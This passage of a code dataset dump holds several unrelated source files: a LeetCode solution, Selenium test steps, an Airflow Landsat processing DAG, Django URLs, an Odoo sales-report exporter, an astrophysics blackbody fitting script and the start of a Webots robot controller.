= sorted(A)\n longest_perimeter = 0\n # reversely iterate over the lengths list A\n for i in reversed(range(2, len(A))):\n # calculate the sum of the previous two nums\n sum = A[i - 2] + A[i - 1]\n # it the sum is bigger than this one, the triangle is valid\n if sum > A[i]:\n sum += A[i]\n # update the longest perimeter\n if sum > longest_perimeter:\n longest_perimeter = sum\n return longest_perimeter\n\ninput1 = [2,1,2]\ninput2 = [1,2,1]\ninput3 = [3,2,3,4]\ninput4 = [3,6,2,3]\nprint(largestPerimeter(input4))\n","sub_path":"LeetCode-Python/976 Largest Perimeter Triangle.py","file_name":"976 Largest Perimeter Triangle.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"577210419","text":"from behave import when, then\nfrom selenium.webdriver.common.by import By\n\nHELP_SEARCH = (By.ID, 'helpsearch')\nSEARCH_ICON = (By.CSS_SELECTOR, \"input.a-button-input\")\nHELP_CONTENT = (By.CSS_SELECTOR, \"div.help-content h1\")\n\n\n@when('Search for \"Cancel order\" and Click Go')\ndef search_help(context):\n search_help_field = context.driver.find_element(*HELP_SEARCH)\n search_help_field.clear()\n search_help_field.send_keys(\"Cancel order\")\n context.driver.find_element(*SEARCH_ICON).click()\n\n\n@then('Verify that \"Cancel Items or Orders\" text is present')\ndef verify_result(context):\n result_text = context.driver.find_element(*HELP_CONTENT).text\n assert \"Cancel Items or Orders\" in result_text\n","sub_path":"features/steps/help_page_steps.py","file_name":"help_page_steps.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"303167529","text":"\"\"\"\nRun ARD NRT provisional pipeline for Landsat in Airflow.\n\"\"\"\nimport logging\nfrom datetime import datetime, timedelta\n\nfrom kubernetes.client.models import V1Volume, V1VolumeMount\nfrom kubernetes.client import models as k8s\n\nfrom airflow import DAG\nfrom airflow.kubernetes.secret import Secret\nfrom airflow.providers.cncf.kubernetes.operators.kubernetes_pod import (\n KubernetesPodOperator,\n)\n\nfrom infra.images import WAGL_IMAGE_POC\nfrom infra.pools import WAGL_TASK_POOL\nfrom infra.sns_topics import PUBLISH_ARD_NRT_LS_SNS\nfrom infra.sqs_queues import ARD_NRT_LS_PROCESS_SCENE_QUEUE\nfrom infra.variables import ARD_NRT_LS_CREDS\n\n_LOG = logging.getLogger()\n\ndefault_args = {\n \"owner\": \"Imam Alam\",\n \"depends_on_past\": False,\n \"start_date\": datetime(2021, 6, 1),\n \"email\": [\"imam.alam@ga.gov.au\"],\n \"email_on_failure\": False,\n \"email_on_retry\": False,\n \"retries\": 0,\n \"retry_delay\": timedelta(minutes=5),\n \"pool\": WAGL_TASK_POOL,\n \"secrets\": [\n Secret(\"env\", None, ARD_NRT_LS_CREDS),\n Secret(\"env\", None, \"modtran-key\"),\n ],\n}\n\nESTIMATED_COMPLETION_TIME = 3 * 60 * 60\n\nBUCKET_REGION = \"ap-southeast-2\"\nS3_PREFIX = \"s3://dea-public-data/baseline/\"\nEXPLORER_URL = \"https://explorer-aws.dea.ga.gov.au\"\n\nMAX_ACTIVE_RUNS = 80\n\naffinity = {\n \"nodeAffinity\": {\n \"requiredDuringSchedulingIgnoredDuringExecution\": {\n \"nodeSelectorTerms\": [\n {\n \"matchExpressions\": [\n {\n \"key\": \"nodegroup\",\n \"operator\": \"In\",\n \"values\": [\n \"memory-optimised-wagl-s2-nrt-r5-l\",\n ],\n }\n ]\n }\n ]\n }\n }\n}\n\ntolerations = [\n {\"key\": \"dedicated\", \"operator\": \"Equal\", \"value\": \"wagl\", \"effect\": \"NoSchedule\"}\n]\n\nancillary_volume_mount = V1VolumeMount(\n name=\"wagl-nrt-ancillary-volume\",\n mount_path=\"/ancillary\",\n sub_path=None,\n read_only=False,\n)\n\nancillary_volume = V1Volume(\n name=\"wagl-nrt-ancillary-volume\",\n persistent_volume_claim=k8s.V1PersistentVolumeClaimVolumeSource(\n claim_name=\"wagl-nrt-ancillary-volume\"\n ),\n)\n\npipeline = DAG(\n \"k8s_ard_nrt_landsat_provisional\",\n doc_md=__doc__,\n default_args=default_args,\n description=\"DEA Landsat ARD NRT processing (provisional)\",\n concurrency=MAX_ACTIVE_RUNS,\n max_active_runs=MAX_ACTIVE_RUNS,\n catchup=False,\n params={},\n schedule_interval=timedelta(minutes=1),\n tags=[\"k8s\", \"dea\", \"psc\", \"ard\", \"wagl\", \"nrt\", \"landsat\", \"provisional\"],\n)\n\nwith pipeline:\n RUN = KubernetesPodOperator(\n namespace=\"processing\",\n name=\"dea-ard-nrt-landsat-provisional\",\n task_id=\"dea-ard-nrt-landsat-provisional\",\n image_pull_policy=\"IfNotPresent\",\n image=WAGL_IMAGE_POC,\n affinity=affinity,\n tolerations=tolerations,\n startup_timeout_seconds=600,\n cmds=[\"/scripts/aws-process-scene-landsat.sh\"],\n arguments=[\n ARD_NRT_LS_PROCESS_SCENE_QUEUE,\n S3_PREFIX,\n PUBLISH_ARD_NRT_LS_SNS,\n EXPLORER_URL,\n ],\n labels={\n \"runner\": \"airflow\",\n \"product\": \"Landsat\",\n \"app\": \"nrt\",\n \"stage\": \"wagl\",\n },\n env_vars=dict(\n MODTRAN_DATA=\"/ancillary/MODTRAN6.0.2.3G/DATA\",\n ),\n get_logs=True,\n resources={\n \"request_cpu\": \"1000m\",\n \"request_memory\": \"12Gi\",\n },\n volumes=[ancillary_volume],\n volume_mounts=[ancillary_volume_mount],\n execution_timeout=timedelta(minutes=180),\n is_delete_operator_pod=True,\n )\n","sub_path":"dags/ard/k8s_ard_nrt_landsat_provisional.py","file_name":"k8s_ard_nrt_landsat_provisional.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"104178532","text":"from django.conf.urls import url\nfrom . import views\nurlpatterns = [\n url(r\"^$\",views.order1),\n url(r\"^all\",views.all_order_list),\n url(r\"^payend\",views.payend_list),\n url(r\"^nopay\",views.nopay_list),\n url(r\"^delete\",views.deleteit),\n url(r\"^cancel\",views.cancelit),\n]","sub_path":"scooping/order/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"653399279","text":"import math\nimport pyqtgraph as pg\n\nt = range(0,100)\nx = [0] * len(t)\ny = [0] * len(t)\n\nfor idx, val in enumerate(t):\n\tx[idx] = float(val) * 0.01\n\ty[idx] = math.sin(2 * math.pi * x[idx])\n\t\np = pg.plot(x,y)\n\nwin = pg.GraphicsWindow()\nwin.addPlot(p)\n\npg.show()\n\nprint(x)\nprint(y)\n","sub_path":"Graph/real_time.py","file_name":"real_time.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"596900374","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nfrom collections import deque\nimport json\n\nfrom odoo import http\nfrom odoo.http import request\nfrom odoo.tools import ustr\nfrom odoo.tools.misc import xlwt\n\nfrom datetime import datetime\nfrom datetime import date\nimport ast\n\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass SalesReportByInvoice(http.Controller):\n\n\t@http.route('/web/export_xls/sales_report_by_invoice', type='http', auth=\"user\")\n\tdef export_xls(self, filename, date_from, date_to, **kw):\n\t\tworkbook = xlwt.Workbook()\n\t\tworksheet = workbook.add_sheet('Sales Report By Invoice')\n\n\t\tinvoice_ids = request.env['account.invoice'].sudo().search([('date_invoice','>=',date_from),('date_invoice','<=',date_to)],order='date_invoice desc')\n\n\t\t# STYLES\n\t\tstyle_header_bold = xlwt.easyxf(\"font: bold on;font: name Calibri;align: wrap no\")\n\t\tstyle_header_right = xlwt.easyxf(\"font: name Calibri;align: horiz right, wrap no\")\n\t\tstyle_table_header_bold = xlwt.easyxf(\"font: bold on;font: name Calibri;align: horiz centre, vert centre, wrap on;borders: top thin, bottom thin, right thin;\")\n\t\tstyle_table_row = xlwt.easyxf(\"font: name Calibri;align: horiz left, wrap no;borders: top thin, bottom thin, right thin;\")\n\t\tstyle_table_row_amount = xlwt.easyxf(\"font: name Calibri;align: horiz right, wrap no;borders: top thin, bottom thin, right thin;\", num_format_str=\"#,##0.00\")\n\t\tstyle_table_total = xlwt.easyxf(\"pattern: pattern solid, fore_colour pale_blue;font: bold on;font: name Calibri;align: horiz left, wrap no;borders: top thin, bottom medium, right thin;\")\n\t\tstyle_table_total_value = xlwt.easyxf(\"pattern: pattern solid, fore_colour pale_blue;font: bold on;font: name Calibri;align: horiz right, wrap no;borders: top thin, bottom medium, right thin;\", num_format_str=\"#,##0.00\")\n\t\tstyle_end_report = xlwt.easyxf(\"font: bold on;font: name Calibri;align: horiz left, wrap no;\")\n\t\tworksheet.col(0).width = 300*12\n\t\tworksheet.col(1).width = 300*12\n\t\tworksheet.col(2).width = 500*12\n\t\tworksheet.col(3).width = 500*12\n\t\tworksheet.col(4).width = 250*12\n\t\tworksheet.col(5).width = 250*12\n\t\tworksheet.col(6).width = 250*12\n\t\tworksheet.col(7).width = 300*12\n\t\tworksheet.col(8).width = 250*12\n\n\t\t# TEMPLATE HEADERS\n\n\t\t# TABLE HEADER\n\t\tworksheet.write(0, 0, 'CITY', style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 1, 'AREA', style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 2, 'SALES AGENT', style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 3, \"CLIENT'S NAME\", style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 4, 'TERMS', style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 5, 'DUE DATE', style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 6, 'INVOICE DATE', style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 7, 'INVOICE NO.', style_table_header_bold) # HEADER\n\t\tworksheet.write(0, 8, 'AMOUNT', style_table_header_bold) # HEADER\n\t\t\n\t\trow_count = 1\n\n\t\tfor invoice in invoice_ids:\n\t\t\t\n\n\t\t\tworksheet.write(row_count, 0, invoice.partner_id.city or '', style_table_row) \n\t\t\tworksheet.write(row_count, 1, invoice.partner_id.partner_area_id.name or '', style_table_row) \n\t\t\tworksheet.write(row_count, 2, invoice.user_id.name or '', style_table_row) \n\t\t\tworksheet.write(row_count, 3, invoice.partner_id.name or '', style_table_row) \n\t\t\tworksheet.write(row_count, 4, invoice.payment_term_id.name or '', style_table_row) \n\t\t\tworksheet.write(row_count, 5, invoice.date_due or '', style_table_row) \n\t\t\tworksheet.write(row_count, 6, invoice.date_invoice or '', style_table_row) \n\t\t\tworksheet.write(row_count, 7, invoice.number or '', style_table_row) \n\t\t\tworksheet.write(row_count, 8, invoice.amount_total or '', style_table_row_amount) \n\t\t\trow_count +=1\n\t \n\n\t\tresponse = request.make_response(None,\n\t\t\theaders=[('Content-Type', 'application/vnd.ms-excel'),\n\t\t\t\t\t('Content-Disposition', 'attachment; filename=%s;'%(filename)\n\t\t\t\t\t)])\n\n\t\tworkbook.save(response.stream)\n\n\t\treturn response\n","sub_path":"indigo_prod/controllers/sales_report_by_invoice.py","file_name":"sales_report_by_invoice.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"437009094","text":"#!/usr/bin/env python3\n# Author: Simeon Reusch (simeon.reusch@desy.de)\n# License: BSD-3-Clause\n\nimport logging, os, argparse, time, json\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nfrom astropy import units as u\nimport matplotlib.pyplot as plt\nimport json\nfrom modelSED import utilities, fit, sncosmo_spectral_v13\nfrom modelSED.utilities import broken_powerlaw_spectrum, FNU\nfrom astropy.cosmology import Planck15 as cosmo\n\n# from modelSED.fit import powerlaw_minimizer\nfrom lmfit import Model, Parameters, Minimizer, report_fit, minimize\n\nnice_fonts = {\n \"text.usetex\": True,\n \"font.family\": \"serif\",\n \"font.serif\": \"Times New Roman\",\n}\nmatplotlib.rcParams.update(nice_fonts)\n\nLIGHTCURVE_INFILE = os.path.join(\"data\", \"lightcurves\", \"full_lightcurve.csv\")\n\n# MJD_INTERVALS = [[58700, 58720], [59006, 59032], [59110, 59130], [59220,59265]]\nMJD_INTERVALS = [[58700, 58720], [59006, 59130], [59220, 59271]]\n\n# FITPARAMS_FILE = os.path.join(\"data\", \"fitparams_late_epoch.json\")\nMJD = 59005.12846212167\nREDSHIFT = 0.2666\nFONTSIZE = 12\nFONTSIZE_LABEL = 13\nFONTSIZE_LEGEND = 5\nANNOTATION_FONTSIZE = 8\nFONTSIZE_TICKMARKS = 9\nFIG_WIDTH = 6\nDPI = 400\nINSTRUMENT_DATA_DIR = \"instrument_data\"\nPLOTDIR = os.path.join(\"plots\", \"double_blackbody\")\nFITDIR = os.path.join(\"fit\", \"double_blackbody\")\n\n## EXTINCTION FROM EPOCH 1\n# GLOBAL_AV = 1.48477495\n# GLOBAL_RV = 3.93929588\n\n## EXTINCTION FROM EPOCH 0\nGLOBAL_AV = 0.3643711523794127\nGLOBAL_RV = 4.2694173002543225\n\nFITMETHOD = \"lm\"\n\nREFIT = True\nFIT = 3\nINTERVALS = [0]\nEXTINCTIONFIT_INTERVAL = 4\n\n\nfor directory in [PLOTDIR, FITDIR]:\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef load_info_json(filename: str):\n with open(os.path.join(INSTRUMENT_DATA_DIR, filename + \".json\")) as json_file:\n outfile = json.load(json_file)\n return outfile\n\n\ndef double_blackbody_minimizer(params, x, data=None, data_err=None, **kwargs):\n \"\"\" \"\"\"\n filter_wl = utilities.load_info_json(\"filter_wl\")\n\n wl_filter = {v: k for k, v in filter_wl.items()}\n\n temp1 = params[\"temp1\"]\n scale1 = params[\"scale1\"]\n if FIT == 3:\n temp2 = params[\"temp2\"]\n scale2 = params[\"scale2\"]\n if \"extinction_av\" in params:\n extinction_av = params[\"extinction_av\"]\n elif INTERVAL != EXTINCTIONFIT_INTERVAL:\n extinction_av = GLOBAL_AV\n else:\n extinction_av = None\n\n if \"extinction_rv\" in params:\n extinction_rv = params[\"extinction_rv\"]\n elif INTERVAL != EXTINCTIONFIT_INTERVAL:\n extinction_rv = GLOBAL_RV\n else:\n extinction_rv = None\n\n redshift = REDSHIFT\n\n spectrum1 = utilities.blackbody_spectrum(\n temperature=temp1,\n scale=scale1,\n extinction_av=extinction_av,\n extinction_rv=extinction_rv,\n redshift=redshift,\n )\n\n if FIT == 3:\n spectrum2 = utilities.blackbody_spectrum(\n temperature=temp2,\n scale=scale2,\n extinction_av=extinction_av,\n extinction_rv=extinction_rv,\n redshift=redshift,\n )\n\n ab_model_list = []\n flux_list = []\n\n flux1 = spectrum1.flux\n if FIT == 3:\n flux2 = spectrum2.flux\n else:\n flux2 = 0\n\n fluxcomb = flux1 + flux2\n spectrum = sncosmo_spectral_v13.Spectrum(\n wave=spectrum1.wave, flux=fluxcomb, unit=FNU\n )\n\n for i in x:\n ab_model = utilities.magnitude_in_band(wl_filter[i], spectrum)\n flux = utilities.abmag_to_flux(ab_model)\n ab_model_list.append(ab_model)\n flux_list.append(flux)\n\n if \"flux\" in kwargs.keys():\n if data:\n return np.asarray(flux_list) - np.asarray(data)\n else:\n return flux_list\n\n if data and not data_err:\n residual = np.asarray(ab_model_list) - np.asarray(data)\n print(residual)\n return residual\n elif data_err:\n residual = (np.asarray(ab_model_list) - np.asarray(data)) / np.asarray(data_err)\n print(residual)\n print(np.mean(abs(residual)))\n print(\"-------------------------------------------\")\n return residual\n else:\n return ab_model_list\n\n\n# BANDS_TO_EXCLUDE = [\"P200+J\", \"P48+ZTF_g\", \"P48+ZTF_r\", \"P48+ZTF_i\", \"Swift+B\", \"Swift+V\"]\n# BANDS_TO_EXCLUDE = [\"P200+J\"]\nBANDS_TO_EXCLUDE = [\n \"P200_sextractor+J\",\n \"P200_sextractor+H\",\n \"P200_sextractor+Ks\",\n \"Swift+B\",\n \"Swift+U\",\n \"Swift+V\",\n]\nBANDS_TO_FIT_BB_1 = [\"P48+ZTF_g\", \"P48+ZTF_r\", \"P48+ZTF_i\", \"Swift+UVM2\"]\nBANDS_TO_FIT_BB_2 = [\"P200+J\", \"P200+H\", \"P200+Ks\", \"WISE+W1\", \"WISE+W2\"]\n\nfor INTERVAL in INTERVALS:\n FITFILENAMES = {\n 1: os.path.join(FITDIR, f\"{INTERVAL}_fitparams_optical_uv.json\"),\n 2: os.path.join(FITDIR, f\"{INTERVAL}_fitparams_infrared.json\"),\n 3: os.path.join(FITDIR, f\"{INTERVAL}_fitparams_all.json\"),\n }\n\n magnitudes = {}\n\n df = pd.read_csv(LIGHTCURVE_INFILE)\n\n df_cut = df.query(\n f\"obsmjd > {MJD_INTERVALS[INTERVAL][0]} and obsmjd < {MJD_INTERVALS[INTERVAL][1]}\"\n )\n\n df_cut[\"telescope_band\"] = df_cut.telescope + \"+\" + df_cut.band\n\n for tband in df_cut[\"telescope_band\"].unique():\n if tband not in BANDS_TO_EXCLUDE:\n _df = df_cut.query(f\"telescope_band == @tband\")\n magnitudes.update(\n {tband: [np.mean(_df.mag.values), np.mean(_df.mag_err.values)]}\n )\n\n columns = [\"instrument\", \"band\", \"mag\", \"mag_err\"]\n df = pd.DataFrame(columns=columns)\n instrument = []\n band = []\n mag = []\n mag_err = []\n for index, entry in enumerate(magnitudes):\n mag.append(magnitudes[entry][0])\n mag_err.append(magnitudes[entry][1])\n instrument.append(entry.split(\"+\")[0])\n band.append(entry.split(\"+\")[1])\n\n df[\"instrument\"] = instrument\n df[\"band\"] = band\n df[\"mag\"] = mag\n df[\"mag_err\"] = mag_err\n df[\"flux\"] = utilities.abmag_to_flux(df.mag)\n df[\"flux_err\"] = utilities.abmag_err_to_flux_err(df.mag, df.mag_err)\n\n filter_wl = load_info_json(\"filter_wl\")\n cmap = load_info_json(\"cmap\")\n filterlabel = load_info_json(\"filterlabel\")\n\n # Now fit the sum of two spectra\n mags = []\n mag_errs = []\n wls = []\n\n df[\"instrumentband\"] = df[\"instrument\"] + \"+\" + df[\"band\"]\n\n if FIT == 1 or FIT == 2:\n df_fit = df.query(f\"instrumentband in @BANDS_TO_FIT_BB_{FIT}\")\n else:\n df_fit = df\n\n for index, row in df_fit.iterrows():\n mags.append(row[\"mag\"])\n mag_errs.append(row[\"mag_err\"])\n instrumentband = row[\"instrument\"] + \"+\" + row[\"band\"]\n wls.append(filter_wl[instrumentband])\n\n params = Parameters()\n params.add(\"temp1\", value=14000, min=100, max=150000)\n params.add(\"scale1\", value=1e23, min=1e18, max=1e27)\n\n if FIT == 3:\n params.add(\"temp2\", value=1400, min=100, max=150000)\n params.add(\"scale2\", value=1e20, min=1e18, max=1e27)\n if (FIT == 1 or FIT == 3) and INTERVAL == EXTINCTIONFIT_INTERVAL:\n params.add(\"extinction_av\", value=0.1, min=0.000000001, max=4)\n params.add(\"extinction_rv\", value=3.1, min=1, max=5)\n\n x = wls\n data = mags\n data_err = mag_errs\n\n minimizer_fcn = double_blackbody_minimizer\n\n if REFIT:\n minimizer = Minimizer(\n minimizer_fcn, params, fcn_args=(x, data, data_err), fcn_kws=None\n )\n out = minimizer.minimize(method=FITMETHOD)\n print(report_fit(out.params))\n\n temp1 = out.params[\"temp1\"].value\n scale1 = out.params[\"scale1\"].value\n\n if \"extinction_av\" in out.params.keys():\n extinction_av = out.params[\"extinction_av\"].value\n else:\n extinction_av = None\n if \"extinction_rv\" in out.params.keys():\n extinction_rv = out.params[\"extinction_rv\"].value\n else:\n extinction_rv = None\n if \"temp2\" in out.params.keys():\n temp2 = out.params[\"temp2\"].value\n else:\n temp2 = None\n if \"scale2\" in out.params.keys():\n scale2 = out.params[\"scale2\"].value\n else:\n scale2 = None\n\n fitresult = {\n \"temp1\": temp1,\n \"scale1\": scale1,\n \"temp2\": temp2,\n \"scale2\": scale2,\n \"extinction_av\": extinction_av,\n \"extinction_rv\": extinction_rv,\n }\n\n with open(FITFILENAMES[FIT], \"w\") as outfile:\n json.dump(fitresult, outfile)\n\n else:\n with open(FITFILENAMES[FIT]) as infile:\n fitresult = json.load(infile)\n\n wavelengths, frequencies = utilities.get_wavelengths_and_frequencies()\n\n if INTERVAL == EXTINCTIONFIT_INTERVAL:\n extinction_av = fitresult[\"extinction_av\"]\n extinction_rv = fitresult[\"extinction_rv\"]\n else:\n extinction_av = GLOBAL_AV\n extinction_rv = GLOBAL_RV\n\n fitted_spectrum_1, bolo_flux_1 = utilities.blackbody_spectrum(\n temperature=fitresult[\"temp1\"],\n scale=fitresult[\"scale1\"],\n extinction_av=extinction_av,\n extinction_rv=extinction_rv,\n redshift=REDSHIFT,\n get_bolometric_flux=True,\n )\n unextincted_spectrum_1, bolo_flux_1_unext = utilities.blackbody_spectrum(\n temperature=fitresult[\"temp1\"],\n scale=fitresult[\"scale1\"],\n extinction_av=None,\n extinction_rv=None,\n redshift=None,\n get_bolometric_flux=True,\n )\n\n if FIT == 3:\n fitted_spectrum_2, bolo_flux_2 = utilities.blackbody_spectrum(\n temperature=fitresult[\"temp2\"],\n scale=fitresult[\"scale2\"],\n extinction_av=extinction_av,\n extinction_rv=extinction_rv,\n redshift=REDSHIFT,\n get_bolometric_flux=True,\n )\n unextincted_spectrum_2, bolo_flux_2_unext = utilities.blackbody_spectrum(\n temperature=fitresult[\"temp2\"],\n scale=fitresult[\"scale2\"],\n extinction_av=None,\n extinction_rv=None,\n redshift=None,\n get_bolometric_flux=True,\n )\n\n combined_flux = fitted_spectrum_1.flux + fitted_spectrum_2.flux\n\n combined_spectrum = sncosmo_spectral_v13.Spectrum(\n wave=fitted_spectrum_1.wave, flux=combined_flux, unit=FNU\n )\n\n # # # Calculate luminosity\n luminosity_1, _, radius1, _ = utilities.calculate_bolometric_luminosity(\n temperature=fitresult[\"temp1\"],\n scale=fitresult[\"scale1\"],\n redshift=REDSHIFT,\n temperature_err=None,\n scale_err=None,\n )\n luminosity_2, _, radius2, _ = utilities.calculate_bolometric_luminosity(\n temperature=fitresult[\"temp2\"],\n scale=fitresult[\"scale2\"],\n redshift=REDSHIFT,\n temperature_err=None,\n scale_err=None,\n )\n total_luminosity = luminosity_1 + luminosity_2\n\n print(\"--------------------------------\")\n print(f\"temp optical/UV: {fitresult['temp1']:.0f} K\")\n print(f\"temp infrared: {fitresult['temp2']:.0f} K\")\n print(f\"luminosity optical/UV = {luminosity_1:.2e}\")\n print(f\"luminosity infrared = {luminosity_2:.2e}\")\n print(f\"total luminosity = {total_luminosity:.2e}\")\n print(f\"radius optical/UV = {radius1:.2e}\")\n print(f\"radius infrared = {radius2:.2e}\")\n print(\"--------------------------------\")\n\n # Now we plot\n ###\n plotmag = False\n ###\n\n plt.figure(figsize=(FIG_WIDTH, 1 / 1.414 * FIG_WIDTH), dpi=DPI)\n ax1 = plt.subplot(111)\n plt.xscale(\"log\")\n\n if not plotmag:\n ax1.set_ylabel(\n r\"$\\nu$ F$_\\nu$ [erg s$^{-1}$ cm$^{-2}$]\", fontsize=FONTSIZE_LABEL\n )\n ax1.set_xlabel(\"Frequency [Hz] (source frame)\", fontsize=FONTSIZE_LABEL)\n ax1.set_xlim([5e13, 2e15])\n ax1.set_ylim([9e-14, 1e-11])\n # ax1.set_ylim([9e-16, 1e-11])\n plt.yscale(\"log\")\n for band in df.band:\n df_red = df.query(f\"band == '{band}'\")\n key = (df_red.instrument.values + \"+\" + df_red.band.values)[0]\n nu = utilities.lambda_to_nu(filter_wl[key])\n\n ax1.errorbar(\n nu * (1 + REDSHIFT),\n df_red.flux.values * nu * (1 + REDSHIFT),\n df_red.flux_err.values * nu * (1 + REDSHIFT),\n color=cmap[key],\n label=filterlabel[key],\n fmt=\".\",\n markersize=10,\n )\n nu = utilities.lambda_to_nu(fitted_spectrum_1.wave)\n\n # OPTICAL / UV\n ax1.plot(\n utilities.lambda_to_nu(fitted_spectrum_1.wave) * (1 + REDSHIFT),\n fitted_spectrum_1.flux\n * utilities.lambda_to_nu(fitted_spectrum_1.wave)\n * (1 + REDSHIFT),\n color=\"tab:blue\",\n linestyle=\"dotted\",\n label=f\"1 extincted\",\n )\n ax1.plot(\n utilities.lambda_to_nu(unextincted_spectrum_1.wave),\n unextincted_spectrum_1.flux\n * utilities.lambda_to_nu(unextincted_spectrum_1.wave),\n color=\"tab:blue\",\n linestyle=\"dotted\",\n linewidth=0.6,\n label=f\"1 unextincted\",\n )\n\n if FIT == 3:\n ax1.plot(\n utilities.lambda_to_nu(fitted_spectrum_2.wave) * (1 + REDSHIFT),\n fitted_spectrum_2.flux\n * utilities.lambda_to_nu(fitted_spectrum_2.wave)\n * (1 + REDSHIFT),\n color=\"tab:red\",\n linestyle=\"dotted\",\n label=f\"2 extincted\",\n )\n ax1.plot(\n utilities.lambda_to_nu(unextincted_spectrum_2.wave),\n unextincted_spectrum_2.flux\n * utilities.lambda_to_nu(unextincted_spectrum_2.wave),\n color=\"tab:red\",\n linestyle=\"dotted\",\n linewidth=0.6,\n label=f\"2 unextincted\",\n )\n ax1.plot(\n utilities.lambda_to_nu(combined_spectrum.wave) * (1 + REDSHIFT),\n combined_spectrum.flux\n * utilities.lambda_to_nu(combined_spectrum.wave)\n * (1 + REDSHIFT),\n color=\"black\",\n # linestyle=\"dotted\",\n label=rf\"combined spectrum\",\n )\n\n ax2 = ax1.secondary_xaxis(\n \"top\", functions=(utilities.nu_to_ev, utilities.ev_to_nu)\n )\n ax2.set_xlabel(r\"Energy [eV]\", fontsize=FONTSIZE_LABEL)\n plt.grid(which=\"both\", alpha=0.15)\n\n d = cosmo.luminosity_distance(REDSHIFT)\n d = d.to(u.cm).value\n lumi = lambda flux: flux * 4 * np.pi * d ** 2\n flux = lambda lumi: lumi / (4 * np.pi * d ** 2)\n ax3 = ax1.secondary_yaxis(\"right\", functions=(lumi, flux))\n ax3.tick_params(axis=\"y\", which=\"major\", labelsize=FONTSIZE_TICKMARKS)\n ax3.set_ylabel(r\"$\\nu$ L$_\\nu$ [erg s$^{-1}$]\", fontsize=FONTSIZE_LABEL)\n\n else:\n ax1.set_ylabel(\"Magnitude [AB]\", fontsize=FONTSIZE_LABEL)\n ax1.set_xlabel(r\"Wavelength $[\\AA]$\", fontsize=FONTSIZE_LABEL)\n ax1.invert_yaxis()\n ax1.set_ylim([21, 15])\n\n for band in df.band:\n df_red = df.query(f\"band == '{band}'\")\n key = (df_red.instrument.values + \"+\" + df_red.band.values)[0]\n ax1.errorbar(\n filter_wl[key],\n df_red.mag.values,\n df_red.mag_err.values,\n color=cmap[key],\n fmt=\".\",\n label=filterlabel[key],\n markersize=10,\n )\n ax1.plot(\n fitted_spectrum_1.wave,\n utilities.flux_to_abmag(fitted_spectrum_1.flux),\n color=\"darkcyan\",\n linestyle=\"dotted\",\n label=\"spectrum 1\",\n )\n\n # ax1.plot(\n # fitted_spectrum_2.wave,\n # utilities.flux_to_abmag(fitted_spectrum_2.flux),\n # color=\"yellowgreen\",\n # linestyle=\"dotted\",\n # label=\"spectrum 2\",\n # )\n # ax1.plot(\n # fitted_total_spectrum.wave,\n # utilities.flux_to_abmag(fitted_total_spectrum.flux),\n # color=\"purple\",\n # # linestyle=\"dotted\",\n # label=\"sum of fitted spectra\",\n # )\n ax2 = ax1.secondary_xaxis(\n \"top\", functions=(utilities.nu_to_lambda, utilities.lambda_to_nu)\n )\n ax2.set_xlabel(\"Frequency [Hz] (source frame)\", fontsize=FONTSIZE_LABEL)\n\n ax1.tick_params(axis=\"both\", which=\"major\", labelsize=FONTSIZE_TICKMARKS)\n ax2.tick_params(axis=\"y\", which=\"major\", labelsize=FONTSIZE_TICKMARKS)\n\n bbox = dict(boxstyle=\"round\", fc=\"w\", ec=\"gray\")\n annotation = f\"lumin. opt/UV: {luminosity_1:.2e}\\nlumin. IR: {luminosity_2:.2e}\\nlumin. total: {total_luminosity:.2e}\"\n ax1.text(\n 0.35,\n 0.9,\n annotation,\n transform=ax1.transAxes,\n bbox=bbox,\n fontsize=FONTSIZE_LEGEND,\n )\n\n if not os.path.exists(PLOTDIR):\n os.makedirs(PLOTDIR)\n\n if plotmag:\n outfile = os.path.join(PLOTDIR, f\"double_bb_mag_{INTERVAL}_sourceframe.png\")\n else:\n outfile = os.path.join(PLOTDIR, f\"double_bb_nufnu_{INTERVAL}_sourceframe.png\")\n\n loc = {0: \"upper left\", 1: \"upper right\", 2: \"upper right\"}\n\n plt.legend(fontsize=FONTSIZE_LEGEND, loc=loc[INTERVAL])\n plt.tight_layout()\n plt.savefig(outfile)\n plt.close()\n","sub_path":"fit/archive/fit_double_blackbody_sourceframe.py","file_name":"fit_double_blackbody_sourceframe.py","file_ext":"py","file_size_in_byte":17271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"207721221","text":"\"\"\"our_controller controller.\"\"\"\n\n# You may need to import some classes of the controller module. Ex:\n# from controller import Robot, Motor, DistanceSensor\nfrom controller import Robot\n\nTIME_STEP = 64\nrobot = Robot()\n\nds = []\ndsNames = ['ds_front', 'ds_FL', 'ds_left', 'ds_FR', 'ds_right', 'ds_BR', 'ds_BL', 'ds_back']\n\nfor i in range(8):\n \n ds.append(robot.getDistanceSensor(dsNames[i]))\n ds[i].enable(TIME_STEP)\n \nwheels = []\nwheelsNames = ['left_wheel', 'right_wheel']\n\nfor i in range(2):\n \n wheels.append(robot.getMotor(wheelsNames[i]))\n wheels[i].setPosition(float('inf'))\n wheels[i].setVelocity(0.0)\n \nf_ObstacleCounter = 0\nfl_ObstacleCounter = 